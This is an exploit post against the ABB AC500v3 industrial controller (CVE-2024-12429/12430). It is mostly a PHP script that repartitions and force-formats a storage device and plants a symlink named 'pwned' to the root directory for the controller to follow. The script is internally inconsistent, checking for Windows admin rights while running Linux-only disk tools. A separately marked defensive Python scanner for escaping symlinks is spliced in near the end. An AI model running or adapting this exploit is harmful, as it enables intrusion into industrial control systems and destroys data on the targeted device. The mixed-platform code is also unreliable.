ABB AC500v3 3.7.0.569 Symlink Attack
=============================================================================================================================================
| # Title : ABB AC500v3 3.7.0.569 Exploiting Symlink vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://global.abb/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: Exploiting Symlink on ABB AC500 System Using PHP.

(Related: https://packetstorm.news/files/id/188713/ Related CVE numbers: CVE-2024-12429, CVE-2024-12430).

[+] Usage : C:\www>php 2.php /dev/sdX

[+] PayLoad :

<?php

// indoushka
// abb ac500 symlink exploit

// Require exactly one argument (the target device path)
if ($argc != 2) {
    echo "Usage: php abb_ac500_symlink.php /dev/sdX\n";
    exit(1);
}

// Check for administrator rights (NET SESSION is a Windows command)
$isAdmin = (bool) shell_exec('NET SESSION');
if (!$isAdmin) {
    echo "This script must be run as Administrator.\n";
    exit(1);
}

$disk = $argv[1];
$part = $disk . "1";
$mountPoint = "/mnt/sdcard";
$symLinkTarget = "/";
$symLinkName = "pwned";

// Unmount any mounted partitions of the device
exec("umount {$disk}* 2>/dev/null");

// Write a new, empty DOS partition table
$fdiskCommands = "o\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");

// Create one primary partition spanning the device
$fdiskCommands = "n\np\n1\n\n\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");

exec("partprobe {$disk}");

// Format the partition as ext4
exec("mkfs.ext4 -F {$part}");

// Create the mount point directory
mkdir($mountPoint, 0777, true);

// Mount the partition
exec("mount {$part} {$mountPoint}");

// Create the symbolic link on the mounted partition
symlink($symLinkTarget, "{$mountPoint}/{$symLinkName}");

// Run ls -l on the mount point (exec() does not print the listing)
exec("ls -l {$mountPoint}");

// Unmount the partition
exec("umount {$mountPoint}");

echo "Done.\n";
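
A defender-side check for the artifact this PoC leaves on the card, a symbolic link (here `pwned`) whose target is `/`. This is an added example, not part of the original post or of any ABB tooling; `find_escaping_symlinks`, `build_sample_card` and the sample tree are constructed for illustration.

```python
import os
import tempfile


def find_escaping_symlinks(root):
    """Return (link_path, raw_target) for every symlink under root whose
    target is absolute or resolves outside root."""
    root_real = os.path.realpath(root)
    findings = []
    # followlinks=False: never descend through a link while scanning.
    for dirpath, dirnames, filenames in os.walk(root_real, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.readlink(path)
            # Resolve relative targets against the link's own directory.
            resolved = os.path.realpath(os.path.join(dirpath, target))
            inside = os.path.commonpath([root_real, resolved]) == root_real
            # An absolute target is flagged even if it resolves inside root
            # here: on another host it is resolved against that host's "/".
            if os.path.isabs(target) or not inside:
                findings.append((os.path.relpath(path, root_real), target))
    return sorted(findings)


def build_sample_card(base):
    """Constructed sample tree standing in for a mounted card."""
    os.makedirs(os.path.join(base, "data"))
    with open(os.path.join(base, "data", "log.txt"), "w") as fh:
        fh.write("ok\n")
    os.symlink("/", os.path.join(base, "pwned"))              # as in the PoC
    os.symlink("../..", os.path.join(base, "data", "up"))     # relative escape
    os.symlink("log.txt", os.path.join(base, "data", "cur"))  # stays inside
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for link, target in find_escaping_symlinks(build_sample_card(tmp)):
            print(f"suspicious symlink: {link} -> {target}")
```

Point it at the mount point of a card mounted read-only on an inspection workstation before the card goes into a controller.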



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================